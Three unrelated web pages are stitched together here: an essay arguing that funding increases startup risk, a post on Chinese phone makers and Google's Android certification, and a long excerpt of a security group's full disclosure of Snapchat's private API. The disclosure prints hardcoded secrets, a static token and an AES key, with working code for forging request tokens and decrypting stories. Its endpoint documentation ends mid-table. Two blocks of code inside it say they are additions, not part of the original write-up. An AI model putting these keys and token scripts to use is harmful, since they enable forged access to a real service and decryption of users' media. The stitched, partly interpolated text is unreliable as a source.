
Investment increases your risk - swombat.com on startups


URL:http://swombat.com/2013/12/27/investment-increases-risk


It's no secret that I'm a fan of bootstrapping. I like to retain 100% founder control of a business that I'm in. There are some circumstances where I'd consider raising capital (as a springboard, not a cushion), for the right kind of business, but I think they apply only to a very small subset of businesses that are interesting (aka fun to run) or likely, and to a vanishingly small subset of businesses by first-time founders.

That said, I do regard both methods - bootstrapped and funded - as valid ways to build a business. It all depends on your objectives and your circumstances. You couldn't start Google without funding, nor could you grow it to be the success it was. Facebook needed to own the social networking space before it could generate money, so it needed funding too. Even Apple, the cash cow par excellence, needed funding to help jumpstart its manufacturing operations (though nowadays, they'd probably have used Kickstarter). Some businesses are just capital-intensive. Some have a winner-takes-all kind of market where you must be funded to win. Some just don't have an obvious business model upfront.

Every once in a while, though, I speak to someone about funding, in the context of a business that should be cash-generating fairly early, or is already generating decent amounts of cash, and they mention that they're looking for funding to decrease their risk. That's a terrible misconception. Funding does not decrease your personal or your business risk - it increases both.

Risk profile

Taking funding makes your distribution of possible results more binary. By default, a business can be anything from a complete failure (0% or even negative ROI) to a roaring success, with all the options in between available. If you raise funding, however, it cuts out a number of the middle options. VCs will definitely want an exit, and if the exit is too low, this can turn a fairly decent success into a relative failure for the entrepreneur.

For example, building a business worth £20m is a pretty amazing achievement, but if you've raised £10m from a VC to get there, with 2x preferential rights, you would be wiped out, leaving very little money for you as a founder. In that scenario, not taking the funding and building a, say, £5m business instead, would have been a far better financial outcome for the founder.

Angels can be a bit more forgiving, but they're typically looking to exit too, and taking that first bit of funding will gently push you down the road towards taking more and more. Angel funding does not necessarily make the outcome entirely binary (angels are more forgiving if you decide to just run your business and pay dividends), but it can still make a great first business success seem like a failure.

Remember, the VCs, despite all the rosy-coloured articles out there, are not in business to help you. They're in business to make money for themselves and their limited partners. Some do so in more ethical and helpful ways than others, and that's to be commended, but the fundamental business model of the VC is to get a good return on a few superstar investments and limit the damage as much as possible on all the other "failures".

No pain no gain

If funding makes things so much more risky, why bother at all?

Funding is worth taking when you want to trade additional risk for potentially larger gains. Talking of the "startup lottery" is not so far off the mark. Investment is a bit like gambling. When you raise funds, you take on a larger risk, both personally and on behalf of the company, in exchange for a potentially larger return.

If there was any way to increase return without increasing risk, everyone would have done it already (and in fact there are many ways, like getting mentors, learning about the topic, etc).

With this perspective, it becomes obvious when funding is a good idea: you should only take additional risk when you can afford it.

Most first-time founders are broke. Not only that, but being first-time founders, they are already carrying enormous amounts of risk, because they don't know how to run any kind of business, let alone a mega-successful high-growth tech startup. This is as compared with, for example, someone who has run and profitably exited a couple of more traditional businesses in the past, and is now looking for a new challenge. That experienced entrepreneur may be willing to trade some additional risk for a chance of a much larger impact than her previous ventures.

Given these circumstances, I would argue that new founders should be looking to decrease their risk, not increase it. As a first-time founder, it is better to have a risk curve that gives you a 30%-ish chance of making a fair bit more money than you were making in your previous job, with a fairly smooth distribution of lower outcomes and little chance of zero return (not that unlikely in my opinion), than a risk curve that gives you a large chance of zero return and a slightly higher chance of a very large outcome.

And therefore, first-time founders should almost never take funding.




”No one at Google is Returning Our Calls” – DIGITS to DOLLARS


URL:http://digitstodollars.com/2013/12/27/no-one-at-google-is-returning-our-calls/


Back in June I wrote about the China branded OEMs as the last big ‘swing vote bloc’ in the handset market. These vendors which contribute so much to global handset volumes have not fully voted on which mobile operating system to adopt. For the most part, they have embraced Android. Admittedly, there are very few other options. Except in China where many of the mobile Internet companies have dipped their toe in the mobile OS space through re-skinned versions of Android.

However, on my recent visit, I started to hear complaints about how this was working. The smaller OEMs are all having a hard time getting any help from Google. And by help, I mean the ability to comply with Google’s compatibility tests needed to become a certified Android handset.

This is a subject I have covered extensively in the past. Google offers the Android codebase for free download, but this is only part of the software needed to make a phone viable. To get full access to Google’s offering, handset vendors need to meet a variety of tests and sign an agreement with Google. In particular, Google has used access to its other sites as the key negotiating component. You can build a phone using the free-to-download version of Android, but if you want that phone to access G-Mail, Google Maps and in particular, the Google Play app store, then you need to be fully compliant with Google. Let me introduce some acronyms. The set of Google apps in question is known as the ‘G-Suite’ and the compliance regime is called GMA in China. (I admit, I am not sure what that stands for as there have been several compliance regimes over the years.) Put simply, to get into the G-Suite you need to sign up for GMA.

The trick is that GMA is only available to people with a direct relationship with Team Android. For reasons that are not entirely clear, this team has not engaged directly with the China OEMs. My best guess is that the Android GMA team is very small and simply lacks the bandwidth to deal with approving devices from dozens if not hundreds of small vendors. To some degree, they farm out that work to their chipset partners like Qualcomm and Mediatek, but it appears that Google has not fully delegated the GMA to the baseband providers, preferring to keep that power firmly vested in Mountain View. And to be fair, it is no easy task for Google to operate in China. That being said, all the OEMs we spoke with said they would be happy to sign agreements in Hong Kong, which after all is just over the border from Shenzhen.

The net result of all this is that the small vendors, who collectively ship several hundred million phones a year, have to make do. If you buy a phone on the streets of Shenzhen, even a device with no obvious branding on it, you are probably getting a phone that has access to the full G-Suite. My contacts tell me that ‘cracked’ G-Suite keys are readily available in China.

So here we come to the crux of the problem. Android wants to use the G-Suite to control Android as best as they can. But corporate Google just wants billions of people to have ready access to all of Google’s offerings. The compromise in China means cracked software codes, and all the security implications that those likely entail.

One OEM told me that he had tried repeatedly to reach out to Google but got no response. I found this story very resonant, as it was exactly what they told me four years ago about Microsoft. Before Android became a big hit, the China OEMs were hoping to work with Microsoft, a brand they knew well. But they got the same cold shoulder. I am not suggesting that Android is going to go the way of Windows Mobile, but a little bit of work on the part of Android and Google could go a long way to sealing up a very significant constituency.


Snapchat - GSFD


URL:http://gibsonsec.org/snapchat/fulldisclosure/


TOC

  • Foreword and notes
  • Authentication tokens
    • Creating request tokens
    • Creating static tokens
  • Common fields
  • Encrypting/decrypting data
    • Encrypting normal snaps
    • Encrypting stories
  • Index of constants
  • Gzipping data
  • Registering an account (/bq/register, /ph/registeru)
    • Actually registering (/bq/register)
    • Attaching a username (/ph/registeru)
  • Logging in (/bq/login)
  • Logging out (/ph/logout)
  • Fetching snap data (/ph/blob)
  • Uploading and sending snaps (/ph/upload, /ph/send)
    • Uploading your media (/ph/upload)
    • Sending it off (/ph/send)
  • Resending a failed snap (/ph/retry)
  • Posting to a story (/bq/post_story)
  • Deleting story segments (/bq/delete_story)
  • Appending segments to a story directly (/bq/retry_post_story)
  • Posting to a story and sending a snap (/bq/double_post)
  • Finding your friends (/ph/find_friends)
  • Making - or losing - friends (/ph/friend)
  • Getting your friends' best friends (/bq/bests)
  • Getting your friends stories (/bq/stories)
  • Getting updates (/bq/updates)
  • Sending updates (/bq/update_snaps)
  • Sending more updates (/bq/update_stories)
  • Clearing your feed (/ph/clear)
  • Updating your account settings (/ph/settings)
    • Updating your attached email
    • Updating your account privacy
    • Updating your story privacy
    • Updating your maturity settings
  • Updating feature settings (/bq/update_feature_settings)
  • Choosing your number of best friends (/bq/set_num_best_friends)
  • Obligatory exploit POCs
    • The find_friends exploit
    • Bulk registration of accounts

Foreword and notes

Given that it's been around four months since our last Snapchat release, we figured we'd do a refresher on the latest version, and see which of the released exploits had been fixed (full disclosure: none of them). Seeing that nothing had really been improved upon (although, stories are using AES/CBC rather than AES/ECB, which is a start), we decided that it was in everyone's best interests for us to post a full disclosure of everything we've found in our past months of hacking the gibson.

In the time since our previous release, there have been numerous public Snapchat api clients created on GitHub. Thankfully, Snapchat are too busy declining ridiculously high offers from Facebook and Google, and lying to investors (hint: they have no way to tell the genders of their users, see /bq/register for a lack of gender specification) to send unlawful code takedown requests to all the developers involved.

As always, we're contactable via @gibsonsec and [email protected]. Merry Gibsmas!

Technical mumbo-jumbo

This documentation is based on the current build (4.1.01 at the time of writing 23-12-2013) of Snapchat for Android. The Android app uses a mixture of /ph and /bq endpoints - the iOS app is pure /bq, but we haven't documented them all, sorry!

You can use api.snapchat.com, feelinsonice.appspot.com or feelinsonice-hrd.appspot.com as hosts for the API endpoints - they're all the same address at the end of the day.

The documentation may be broken, incomplete, outdated or just plain wrong. We try our best to keep things valid as much as possible, but we're only human after all.

NB! As of the current time of writing, there are two unknown reply fields scattered around the API responses. These are marked with an N/A - explanations welcome to [email protected]. Fields with an asterisk after them (e.g: zipped*) means it's an optional field.

Authentication tokens

Authentication with Snapchat's API is done via a token sent in each request under the name req_token.

In general, it is a combination of two hashes (each salted with the secret), as defined by a specific pattern. You'll be using your normal auth_token for most requests - a few require a static token, which we'll get to in a bit.

Here is some example Python that implements the secret req_token hash:

```python
import hashlib


def request_token(auth_token, timestamp):
    secret = "iEk21fuwZApXlz93750dmW22pw389dPwOk"
    pattern = "0001110111101110001111010101111011010001001110011000110001000110"
    # Two SHA-256 hex digests, each salted with the secret.
    first = hashlib.sha256((secret + auth_token).encode()).hexdigest()
    second = hashlib.sha256((str(timestamp) + secret).encode()).hexdigest()
    # "0" takes the character from the first hash, "1" from the second.
    bits = [first[i] if c == "0" else second[i] for i, c in enumerate(pattern)]
    return "".join(bits)

# Here's a benchmark to make sure your implementation works:
# >>> request_token("m198sOkJEn37DjqZ32lpRu76xmw288xSQ9", 1373209025)
# '9301c956749167186ee713e4f3a3d90446e84d8d19a4ca8ea9b4b314d1c51b7b'
```
  • Things to note:
    • The secret is iEk21fuwZApXlz93750dmW22pw389dPwOk
    • You need two sha256 hashes:
      • secret + auth_token
      • timestamp + secret
    • The pattern is 0001110111101110001111010101111011010001001110011000110001000110
      • 0 means take a character from hash 1 at the point.
      • 1 means take a character from hash 2 at the point.

Creating request tokens

To create a request token (which you will need for 90% of requests), you need to:

  • Take the auth_token you got from logging in
  • Take the current timestamp (epoch/unix timestamp) which you'll need for the req_token and inclusion in the request.
  • Run request_token(auth_token, timestamp)
  • Include it in your request!

Creating static tokens

If you're logging in, you won't have an auth_token yet. Not to fear!

  • Take the static token, m198sOkJEn37DjqZ32lpRu76xmw288xSQ9
  • Take the current timestamp
  • Run request_token(static_token, timestamp)
  • Include it in your request!

Common fields

There are a few fields that are common to most requests and responses:

Requests:

| Field name | Type | Explanation |
| --- | --- | --- |
| username | str | The username of the logged in account. |
| req_token | str | See: Creating request tokens |
| timestamp | int | The unix timestamp of the request - can be arbitrary. |

Responses:

| Field name | Type | Explanation |
| --- | --- | --- |
| logged | bool | This is usually indicative of whether or not your response was successful. |
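A server-side view of the token scheme and the "can be arbitrary" timestamp, as an added example that is not part of the original write-up: `legacy_verify` mirrors the documented check, and `HardenedVerifier` is one assumed replacement using a per-session HMAC key, a freshness window and a nonce cache. The secret, session key, path and all function and class names are constructed for illustration; only the 64-character pattern is taken from the page.

```python
import hashlib
import hmac
import time

# Constructed stand-in for a constant compiled into every client build.
EMBEDDED_SECRET = "constructed-demo-secret"
# Selection pattern as documented above: "0" picks from hash 1, "1" from hash 2.
PATTERN = "0001110111101110001111010101111011010001001110011000110001000110"


def legacy_req_token(auth_token, timestamp):
    """Interleave two salted SHA-256 hex digests, as the page documents."""
    first = hashlib.sha256((EMBEDDED_SECRET + auth_token).encode()).hexdigest()
    second = hashlib.sha256((str(timestamp) + EMBEDDED_SECRET).encode()).hexdigest()
    return "".join(first[i] if c == "0" else second[i]
                   for i, c in enumerate(PATTERN))


def legacy_verify(auth_token, timestamp, req_token, body=b""):
    """Documented behaviour: no freshness check, and `body` is never hashed."""
    return hmac.compare_digest(legacy_req_token(auth_token, timestamp), req_token)


class HardenedVerifier:
    """Assumed replacement design: HMAC-SHA256 under a per-session key that
    never ships in the client binary, bound to path, time, nonce and body."""

    def __init__(self, max_skew=300):
        self.max_skew = max_skew
        self._seen = {}  # (session_id, nonce) -> last second a replay is possible

    @staticmethod
    def sign(session_key, path, timestamp, nonce, body):
        fields = [path, str(timestamp), nonce, hashlib.sha256(body).hexdigest()]
        msg = b""
        for field in fields:
            raw = field.encode()
            # Length-prefix each field so field boundaries are unambiguous.
            msg += len(raw).to_bytes(4, "big") + raw
        return hmac.new(session_key, msg, hashlib.sha256).hexdigest()

    def verify(self, session_id, session_key, path, timestamp, nonce, body,
               mac, now=None):
        now = int(time.time()) if now is None else now
        if abs(now - timestamp) > self.max_skew:
            return "stale"
        expected = self.sign(session_key, path, timestamp, nonce, body)
        if not hmac.compare_digest(expected, mac):
            return "bad-mac"
        # Forget nonces whose timestamps can no longer pass the freshness check.
        self._seen = {k: exp for k, exp in self._seen.items() if exp >= now}
        if (session_id, nonce) in self._seen:
            return "replay"
        self._seen[(session_id, nonce)] = timestamp + self.max_skew
        return "ok"


def demo():
    """Run both verifiers over constructed requests and return the verdicts."""
    auth, old_ts = "constructed-auth-token", 1373209025
    captured = legacy_req_token(auth, old_ts)
    out = {
        # A token captured once keeps verifying, whatever the clock says ...
        "legacy_replayed": legacy_verify(auth, old_ts, captured, b"recipient=alice"),
        # ... and with any other body, because the body is not authenticated.
        "legacy_body_changed": legacy_verify(auth, old_ts, captured, b"recipient=bob"),
    }
    key = hashlib.sha256(b"constructed per-session key").digest()
    now, path, body = 1700000000, "/demo/send", b"recipient=alice"
    verifier = HardenedVerifier()
    mac = verifier.sign(key, path, now, "nonce-1", body)
    out["first_use"] = verifier.verify("s1", key, path, now, "nonce-1", body, mac, now=now)
    out["replayed"] = verifier.verify("s1", key, path, now, "nonce-1", body, mac, now=now + 5)
    out["body_changed"] = verifier.verify("s1", key, path, now, "nonce-1",
                                          b"recipient=bob", mac, now=now)
    old_mac = verifier.sign(key, path, old_ts, "nonce-3", body)
    out["old_timestamp"] = verifier.verify("s1", key, path, old_ts, "nonce-3",
                                           body, old_mac, now=now)
    return out


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, "->", verdict)
```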

Encrypting/decrypting data

Encrypting normal snaps

  • All standard media (read: picture and video) data sent to Snapchat is:
    • Padded using PKCS#5.
    • Encrypted using AES/ECB with a single synchronous key: M02cnQ51Ji97vwT4

Encrypting stories

  • Stories are:
    • Padded using PKCS#7.
    • Encrypted using AES/CBC with a unique IV and key per piece of the story (i.e, there isn't a single key/IV you can use).
      • You can find a media_key and media_iv deep within the return values of a request to /bq/stories.
  • The server does the AES/CBC encryption - segments are sent to the server using the normal AES/ECB (M02c..) encryption.
    • StoryEncryptionAlgorithm#encrypt just calls SnapEncryptionAlgorithm#encrypt.

Here's a rough idea of how to decrypt them:

```python
# To find `media_key` and `media_iv`, see: /bq/stories documentation
import requests
import base64
import mcrypt

res = requests.post(...)  # POST /bq/stories and ensure res is a dict.
# GET /bq/story_blob?story_id=XXXXX from result; .content is the raw encrypted bytes.
data = requests.get(...).content

key = base64.b64decode(res[...]["media_key"])
iv = base64.b64decode(res[...]["media_iv"])

m = mcrypt.MCRYPT("rijndael-128", "cbc")
m.init(key, iv)
dedata = m.decrypt(data)  # Boom.
```

Index of constants

These are just some constants you'll undoubtedly come across working with Snapchat.

- static_token
`m198sOkJEn37DjqZ32lpRu76xmw288xSQ9`
Used to create a req_token to log in to an account.
- ENCRYPT_KEY_2
`M02cnQ51Ji97vwT4`
Used to encrypt/decrypt standard snap data (using AES/ECB)
- req_token pattern
`0001110111101110001111010101111011010001001110011000110001000110`
Used to create a valid req_token. `0` means $hash1, `1` means $hash2.
Where: $hash1 = sha256(secret + auth_token) and
 $hash2 = sha256(timestamp + secret)
- req_token secret
`iEk21fuwZApXlz93750dmW22pw389dPwOk`
Used to salt the hashes used in generating req_tokens.
- various media types:
IMAGE = 0
VIDEO = 1
VIDEO_NOAUDIO = 2
FRIEND_REQUEST = 3
FRIEND_REQUEST_IMAGE = 4
FRIEND_REQUEST_VIDEO = 5
FRIEND_REQUEST_VIDEO_NOAUDIO = 6
- various media states:
NONE = -1
SENT = 0
DELIVERED = 1
VIEWED = 2
SCREENSHOT = 3
- Snapchat's User-agent:
`Snapchat/<snapchat-build> (<phone-model>; Android <build-version>; gzip)`
e.g.: `Snapchat/4.1.01 (Nexus 4; Android 18; gzip)`
This isn't constant per se, but you should send it in your requests anyway.
Get the Android build version from here: http://developer.android.com/reference/android/os/Build.VERSION_CODES.html (18 is Jelly Bean 4.3, for example)
NB! Snapchat will fake the `<snapchat-build>` as `3.0.2` if it can't figure out its own build. So you can use that if you'd like.

Gzipping data

NB! We're sort of hazy on the details and specifics of when you can and can't send gzipped data. Some endpoints appear to support it, others don't. We tried various combinations of encryption, gzipping and other combinations thereof, but got inconsistent results. Your mileage may vary.

Specific fields (mainly snap upload related, as expected) are sent gzipped (if it's supported). This means, where you see a data field, you can sometimes (it's inconsistent) gzip the data, send it as data and set zipped: 1 (note: it's still encrypted prior to gzipping).

How you gzip data will vary in your language, but in Python, it's as easy as:

```python
from io import BytesIO
import gzip

# `encrypted_snap_data` holds the already-encrypted media as bytes.
zipped = BytesIO()
gz = gzip.GzipFile(fileobj=zipped, mode="wb")
gz.write(encrypted_snap_data)
gz.close()
# Send this as `data`, with `zipped: 1`:
gzdata = zipped.getvalue()
```

Registering an account (/bq/register, /ph/registeru)

Actually registering (/bq/register)

```
{
    timestamp: 1373207221,
    req_token: create_token(static_token, 1373207221),
    email: "[email protected]",
    password: "password",
    age: 19,
    birthday: "1994-11-15"
}
```

| Field name | Type | Explanation |
| --- | --- | --- |
| timestamp | int | See: Common fields |
| req_token | str | See: Creating static tokens |
| email | str | Your email. |
| password | str | Your password. |
| age | int | How old you are (as an integer). |
| birthday | str | Your date-of-birth in the format YYYY-MM-DD. |

If your request is successful, you'll see something like this:

```
{
    token: "10634960-5c09-4037-8921-4c447a8c6aa9",
    email: "[email protected]",
    snapchat_phone_number: "+15557350485",
    logged: true
}
```

| Field name | Type | Explanation |
| --- | --- | --- |
| token | str | An authentication token you can use without having to log in again. |
| email | str | Your email. |
| snapchat_phone_number | str | A number you can send a text to, to verify your phone number (OPTIONAL) |
| logged | bool | See: Common fields |

NB! Even though your request failed (as indicated by logged), you'll still get a 200 OK reply.
If your request failed, you'll see something like this:

```
{
    message: "[email protected] is already taken! Login with that email address or try another one",
    logged: false
}
```

Attaching a username (/ph/registeru)

```
{
    timestamp: 1373207221,
    req_token: create_token(static_token, 1373207221),
    email: "[email protected]",
    username: "youraccount"
}
```

| Field name | Type | Explanation |
| --- | --- | --- |
| timestamp | int | See: Common fields |
| req_token | str | See: Creating static tokens |
| email | str | The email attached to your account. |
| username | str | The username you're requesting. |

If your request succeeded, you'll see something similar to logging in (/bq/login).
If your request failed, you'll see something like:

```
{
    message: "Invalid username. Letters and numbers with an optional hyphen, underscore, or period in between please!",
    logged: false
}
```

Logging in (/bq/login)

```
{
    username: "youraccount",
    timestamp: 1373207221,
    req_token: create_token(static_token, 1373207221),
    password: "yourpassword"
}
```

If your reply was successful, you'll get back something like this:

```
{
    bests: ["someguy"],
    score: 0,
    number_of_best_friends: 1,
    received: 0,
    logged: true,
    added_friends: [
        {ts: 1384417608610, name: "somedude", display: "", type: 0},
        {ts: 1385130955168, name: "random", display: "", type: 1}
    ],
    beta_expiration: 0,
    beta_number: -1,
    requests: [
        {display: "", type: 1, ts: 1377613760506, name: "randomstranger"}
    ],
    sent: 0,
    story_privacy: "FRIENDS",
    username: "youraccount",
    snaps: [
        {id: "894720385130955367r", sn: "someguy", ts: 1385130955367, sts: 1385130955367, m: 3, st: 1},
        {id: "116748384417608719r", sn: "randomdude", ts: 1384417608719, sts: 1384417608719, m: 3, st: 1},
        {id: "325924384416555224r", sn: "teamsnapchat", t: 10, ts: 1384416555224, sts: 1384416555224, m: 0, st: 1}
    ],
    friends: [
        {can_see_custom_stories: true, name: "teamsnapchat", display: "Team Snapchat", type: 0},
        {can_see_custom_stories: true, name: "someguy", display: "Some Guy", type: 0},
        {can_see_custom_stories: true, name: "youraccount", display: "", type: 1}
    ],
    device_token: "",
    feature_settings: {},
    snap_p: 1,
    mobile_verification_key: "MTMzNzpnaWJzb24=",
    recents: ["teamsnapchat"],
    added_friends_timestamp: 1385130955168,
    notification_sound_setting: "OFF",
    snapchat_phone_number: "+15557350485",
    auth_token: "85c32786-0c71-44bf-9ba0-77bf18c61db2",
    image_caption: false,
    is_beta: false,
    current_timestamp: 1385378822645,
    can_view_mature_content: false,
    email: "[email protected]",
    should_send_text_to_verify_number: true,
    mobile: ""
}
```

| Field name | Type | Explanation |
| --- | --- | --- |
| bests | list | A list of your "best friends" (most frequently interacted with). |
| score | int | Your arbitrary, and utterly pointless Snapchat score. |
| number_of_best_friends | int | The number of "best friends" you have. |
| received | int | The amount of snaps you've received. |
| logged | bool | See: Common fields |
| added_friends | list | Friends who have added you - See below. |
| beta_expiration* | int | When this beta build (if you're in the beta) expires. |
| beta_number* | int | The number of this beta build. |
| requests | list | Friends who have added you - See below. |
| sent | int | How many snaps you've sent. |
| story_privacy | str | Your story privacy. |
| username | str | Your username. |
| snaps | list | A list of snap-related things - See below. |
| friends | list | A list of all your friends - See below. |
| device_token | str | Used for Google Cloud Messaging PUSH notifications. |
| feature_settings | dict | N/A |
| snap_p | int | Your account privacy. |
| mobile_verification_key | str | A base64'd verification key (+ your username) you can text Snapchat to verify your phone number. |
| recents | list | A list of people you have recently interacted with. |
| added_friends_timestamp | int | A unix timestamp (*1000) of when a friend last added you. |
| notification_sound_setting | str | The app's sound notification settings. |
| snapchat_phone_number | str | A phone number you can text your mobile_verification_key to. |
| auth_token | str | An authentication token. Store this, you'll need it later! |
| image_caption | bool | N/A |
| is_beta* | bool | Whether you're opted into Snapchat Beta or not. |
| current_timestamp | int | A current unix timestamp (*1000). |
| can_view_mature_content | bool | Your maturity settings. |
| email | str | Your email. |
| should_send_text_to_verify_number | bool | Exactly what it says on the tin. |
| mobile | str | Your attached mobile number (if any). |

added_friends is a list of:

| Field name | Type | Explanation |
| --- | --- | --- |
| ts | int | A unix timestamp (*1000) of when they added you. |
| name | str | Their username. |
| display | str | Their display name, set by you. |
| type | int | Whether the account is: public, 0; private, 1. |

requests is a list of:

| Field name | Type | Explanation |
| --- | --- | --- |
| ts | int | A unix timestamp (*1000) of when they added you. |
| name | str | Their username. |
| display | str | Their display name, set by you. |
| type | int | Whether the account is: public, 0; private, 1. |

snaps is a list of:

| Field name | Type | Explanation |
| --- | --- | --- |
| id | str | A unique id for the snap. Ends in either: r, sent to us; or s, sent from us. |
| sn / rp | str | Snap sender/recipient name, respectively. |
| ts | int | A unix timestamp (*1000) of when it was last interacted with. |
| sts | int | A unix timestamp (*1000) of when it was sent (almost always the same as ts). |
| m | int | The media type - See: Index of constants. |
| st | int | The state of the media - See: Index of constants. |
| t | int | Present in unopened snaps (where m=N,st=1) - the time the snap should be viewable for. |

friends is a list of:

| Field name | Type | Explanation |
| --- | --- | --- |
| can_see_custom_stories | bool | Whether the user is allowed to see your stories (on custom privacy). |
| name | str | Their user account name. |
| display | str | Their display name, set by you. |
| type | int | Whether the account is: public, 0; private, 1. |
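For reading a captured /bq/login response, here is an added example (not code from the original write-up) that decodes `snaps` entries using the field meanings above and the media type and state codes from the Index of constants, rejecting entries that do not match the documented shape. The class and function names are hypothetical; the first three sample entries are copied from the response above and the last two are constructed.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from enum import IntEnum
from typing import Optional


class MediaType(IntEnum):  # codes from the page's "Index of constants"
    IMAGE = 0
    VIDEO = 1
    VIDEO_NOAUDIO = 2
    FRIEND_REQUEST = 3
    FRIEND_REQUEST_IMAGE = 4
    FRIEND_REQUEST_VIDEO = 5
    FRIEND_REQUEST_VIDEO_NOAUDIO = 6


class MediaState(IntEnum):
    NONE = -1
    SENT = 0
    DELIVERED = 1
    VIEWED = 2
    SCREENSHOT = 3


@dataclass(frozen=True)
class Snap:
    snap_id: str
    direction: str               # "received" (id ends in r) or "sent" (id ends in s)
    peer: str                    # sender for received snaps, recipient for sent ones
    media: MediaType
    state: MediaState
    sent_at: datetime            # from `sts`
    last_touched: datetime       # from `ts`
    view_seconds: Optional[int]  # `t`, only present on unopened snaps


def _from_ms(ms):
    """Convert the API's millisecond timestamps without float rounding."""
    whole = datetime.fromtimestamp(ms // 1000, tz=timezone.utc)
    return whole + timedelta(milliseconds=ms % 1000)


def decode_snap(entry):
    snap_id = entry["id"]
    direction = {"r": "received", "s": "sent"}.get(snap_id[-1:])
    if direction is None:
        raise ValueError("snap id %r does not end in r or s" % (snap_id,))
    peer = entry["sn"] if direction == "received" else entry["rp"]
    return Snap(
        snap_id=snap_id,
        direction=direction,
        peer=peer,
        media=MediaType(entry["m"]),    # ValueError on an undocumented code
        state=MediaState(entry["st"]),
        sent_at=_from_ms(entry["sts"]),
        last_touched=_from_ms(entry["ts"]),
        view_seconds=entry.get("t"),
    )


def decode_snaps(entries):
    """Return (decoded, rejected); rejected keeps the entry and the reason."""
    decoded, rejected = [], []
    for entry in entries:
        try:
            decoded.append(decode_snap(entry))
        except (KeyError, TypeError, ValueError) as exc:
            rejected.append((entry, "%s: %s" % (type(exc).__name__, exc)))
    return decoded, rejected


SAMPLE_SNAPS = [
    # Copied from the example /bq/login response above.
    {"id": "894720385130955367r", "sn": "someguy", "ts": 1385130955367,
     "sts": 1385130955367, "m": 3, "st": 1},
    {"id": "116748384417608719r", "sn": "randomdude", "ts": 1384417608719,
     "sts": 1384417608719, "m": 3, "st": 1},
    {"id": "325924384416555224r", "sn": "teamsnapchat", "t": 10,
     "ts": 1384416555224, "sts": 1384416555224, "m": 0, "st": 1},
    # Constructed malformed entries: bad id suffix, undocumented media code.
    {"id": "000000000000000000x", "sn": "constructed", "ts": 0, "sts": 0, "m": 0, "st": 1},
    {"id": "000000000000000001r", "sn": "constructed", "ts": 0, "sts": 0, "m": 9, "st": 1},
]

if __name__ == "__main__":
    ok, bad = decode_snaps(SAMPLE_SNAPS)
    for snap in ok:
        print(snap.sent_at.isoformat(), snap.direction, snap.peer,
              snap.media.name, snap.state.name, snap.view_seconds)
    for entry, reason in bad:
        print("rejected", entry["id"], reason)
```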

Logging out (/ph/logout)

```
{
    username: "youraccount",
    timestamp: 1373207221,
    req_token: create_token(auth_token, 1373207221),
    json: "{}",
    events: "[]"
}
```

If your request was successful, you'll get back a 200 OK with no body content.
Doing this makes your authentication token stale - you can't reuse it.

Fetching snap data (/ph/blob)

```
{
    username: "youraccount",
    timestamp: 1373207221,
    req_token: create_token(auth_token, 1373207221),
    id: "97117373178635038r"
}
```

If your request is successful, you will get 200 OK followed by the blob data for the snap you requested:

  • The returned blob is encrypted. See: Encrypting/decrypting data
  • Once decrypted, images will start with \xFF\xD8\xFF\xE0 - almost always JPEG.
  • Once decrypted, videos will start with \x00\x00\x00\x18 - almost always MPEG-4.
  • PNG (\x89PNG) and GIF (GIF8) are uncommon but can be sent by custom clients, as they appear to display correctly.

Your request may be met with 410 Gone if you requested an image that:

Uploading and sending snaps (/ph/upload, /ph/send)

Sending snaps is done in two parts - you upload the media, then tell Snapchat who to send it to.

Uploading your media (/ph/upload)

```
{
    username: "youraccount",
    timestamp: 1373207221,
    req_token: create_token(auth_token, 1373207221),
    media_id: "YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",
    type: 0,
    data: ENCRYPTED_SNAP_DATA
}
```

| Field name | Type | Explanation |
| --- | --- | --- |
| username | str | See: Common fields |
| timestamp | int | See: Common fields |
| req_token | str | See: Creating request tokens |
| media_id | str | A unique identifier for this media - Snapchat uses a UUID. |
| type | int | The type of media you're uploading - 0 for images, 1 for videos |
| data | data | The encrypted media data. |

If your request was successful, you'll get a 200 OK with no body content.
NB! You need to store the media_id to use in /ph/send.

Sending it off (/ph/send)

```
{
    username: "youraccount",
    timestamp: 1373207221,
    req_token: create_token(auth_token, 1373207221),
    media_id: "YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",
    recipient: "teamsnapchat,someguy",
    time: 5,
    zipped: "0"
}
```

| Field name | Type | Explanation |
| --- | --- | --- |
| username | str | See: Common fields |
| timestamp | int | See: Common fields |
| req_token | str | See: Creating request tokens |
| media_id | str | A unique identifier for this media - Snapchat uses a UUID. |
| recipient | str | A comma delimited list of recipients - e.g. teamsnapchat,someguy |
| time | int | An integer, 1-10 inclusive of how long the snap will display for. |
| zipped* | str | 0 or 1, indicating whether or not the data is gzipped. |

If your request was successful, you'll get a 200 OK with no body content.

Resending a failed snap (/ph/retry)

/ph/retry is much like a combined endpoint for /ph/upload and /ph/send.

```
{
    username: "youraccount",
    timestamp: 1373207221,
    req_token: create_token(auth_token, 1373207221),
    media_id: "YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",
    type: 0,
    data: ENCRYPTED_SNAP_DATA,
    zipped: "0",
    recipient: "teamsnapchat,someguy",
    time: 5
}
```

| Field name | Type | Explanation |
| --- | --- | --- |
| username | str | See: Common fields |
| timestamp | int | See: Common fields |
| req_token | str | See: Creating request tokens |
| media_id | str | A unique identifier for this media - Snapchat uses a UUID. |
| type | int | The type of media you're uploading - 0 for images, 1 for videos |
| data | data | The encrypted media data. |
| zipped* | str | 0 or 1, indicating whether or not the data is gzipped. |
| recipient | str | A comma delimited list of recipients - e.g. teamsnapchat,someguy |
| time | int | An integer, 1-10 inclusive of how long the snap will display for. |

If your request was successful, you'll get a 200 OK with no body content.

Posting to a story (/bq/post_story)

```
{
    username: "youraccount",
    timestamp: 1373207221,
    req_token: create_token(auth_token, 1373207221),
    media_id: "YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",
    client_id: "YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",
    caption_text_display: "Foo, bar, baz!",
    thumbnail_data: ENCRYPTED_THUMBNAIL_DATA,
    zipped: "0",
    type: 0,
    time: 10
}
```

| Field name | Type | Explanation |
| --- | --- | --- |
| username | str | See: Common fields |
| timestamp | int | See: Common fields |
| req_token | str | See: Creating request tokens |
| media_id | str | A unique identifier for this media - Snapchat uses a UUID. |
| client_id | str | A unique client identifier - the same as the given media_id. |
| caption_text_display | str | Some form of caption - doesn't seem to be honored/rendered by the receiving client. |
